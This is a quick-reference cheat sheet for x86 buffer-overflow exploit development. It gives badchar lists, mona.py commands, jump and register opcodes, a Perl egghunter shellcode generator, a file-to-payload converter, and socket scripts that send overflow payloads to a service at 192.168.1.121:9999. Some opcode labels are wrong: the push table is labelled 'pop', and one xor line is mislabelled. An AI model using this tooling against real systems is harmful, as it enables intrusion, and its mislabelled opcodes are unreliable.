Quick reference for exploit development. Search the page and find what you need.

  1. Badchars
  2. ASM
  3. Egghunter
  4. Convert file to binary string
  5. Sending the payload

Badchars

All possible hex characters

"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"+
"\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"+
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"+
"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"+
"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f"+
"\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"+
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f"+
"\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"+
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f"+
"\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"+
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf"+
"\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"+
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf"+
"\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"+
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"+
"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

You can probably remove \x00 before testing.

Find badchars with mona.py

Generate bytearray:

!mona bytearray -b "\x00"

Compare memory at crash with previously generated bytearray:

!mona compare -f bytearray.bin

ASM

Compiler

Compile files using nasm:

nasm jmp.bin

Live compiler with:

msf-nasm_shell

Jumps

Jumps to registers

jmp eax \xff\xe0
jmp ecx \xff\xe1
jmp edx \xff\xe2
jmp ebx \xff\xe3
jmp esp \xff\xe4
jmp ebp \xff\xe5
jmp esi \xff\xe6
jmp edi \xff\xe7

Arbitrary jump back

Jumps back 512 bytes from current instruction:

[BITS 32]

global _start
_start:

# ;--- copy eip into ecx
# ;--- Taken from Phrack #62 Article 7 Originally written by Aaron Adams
# http://phrack.org/issues/62/7.html (search the page for Aaron Adams)

fldz
fnstenv [esp-12]
pop ecx
add cl, 10
nop

# ;--- Decrease ecx and jump to it
dec ch ; ecx=-256;
dec ch ; ecx=-256;
jmp ecx ;

Math

Clear a register

xor eax,eax   \x31\xc0
xor ebx,ebx   \x31\xdb
xor edx,edx   \x31\xd2
xor edx,edx   \x31\xc9
xor ebp,ebp   \x31\xed
xor esi,esi   \x31\xf6
xor edi,edi   \x31\xff

Add up to 127 to a register

add eax, 10  \x83\xc0\x0a
add eax, 127 \x83\xc0\x7f

If you want to add to a different register change \xc0 (see stack)

Stack

POP

pop eax \x58
pop ecx \x59
pop edx \x5a
pop ebx \x5b
pop esp \x5c
pop ebp \x5d
pop esi \x5e
pop edi \x5f

PUSH

pop eax \x50
pop ecx \x51
pop edx \x52
pop ebx \x53
pop esp \x54
pop ebp \x55
pop esi \x56
pop edi \x57

Egghunter

Mona.py

!mona egghunter -t ABCD

Use the egg ABCDABCD.

Egg hunter by Matt Miller

You can use the following script to generate an egghunter code.

#!/usr/bin/perl

# Prints egghunter code to be pasted into an exploit.
# Example:
# $ ./egghunter.pl 41424344

use strict;
use warnings;

# This is the egghunter implementation by Matt Miller, $ARGV[0] will be placed instead of the egg
my $egghunter = "\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x%s\\x%s\\x%s\\x%s\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7";

my $egg = $ARGV[0];
my @chars = ($egg =~ m/../g);
printf($egghunter, @chars);
print("\n");

I keep a gist with this simple perl script, in the future there might be a less minimal version here:

egghunter-perl

Convert file to binary string

You can use the following script to convert any binary file compiled with nasm into a binary string that can be pasted into an exploit:

#!/usr/bin/perl
use strict;
use warnings;

my $file = $ARGV[0];
open my $fh, '<:raw', $file;
while(my $bytes_read = read $fh, my $bytes, 1) {
    printf("\\x%02x", ord($bytes));
}
printf("\n");
close($file);

I keep a gist with this simple perl script, in the future there might be a less minimal version here:

File2Payload

Use it with:

$ nasm jmpesp.bin
$ ./file2payload.pl jmpesp
\xff\xe4

Sending the payload

Perl

#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket::INET;

my $host = "192.168.1.121";
my $port = 9999;

my $payload = "A" x 5000;

my $sock = IO::Socket::INET->new(PeerAddr => $host,
                                 PeerPort => $port,
                                 Proto    => 'tcp');
$sock->send("COMMAND " . $payload . "\n");
close $sock;

Python

#!/usr/bin/python
import socket

target = "192.168.1.121"
port = 9999

payload = "A" * 5000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.send("COMMAND " + payload + "\n")
s.close()

Ruby

#!/usr/bin/ruby
require 'socket'

target = '192.168.1.121'
port = 9999

payload = "A" * 5000

s = TCPSocket.open(target, port)
s.puts('COMMAND ' + payload)
s.close()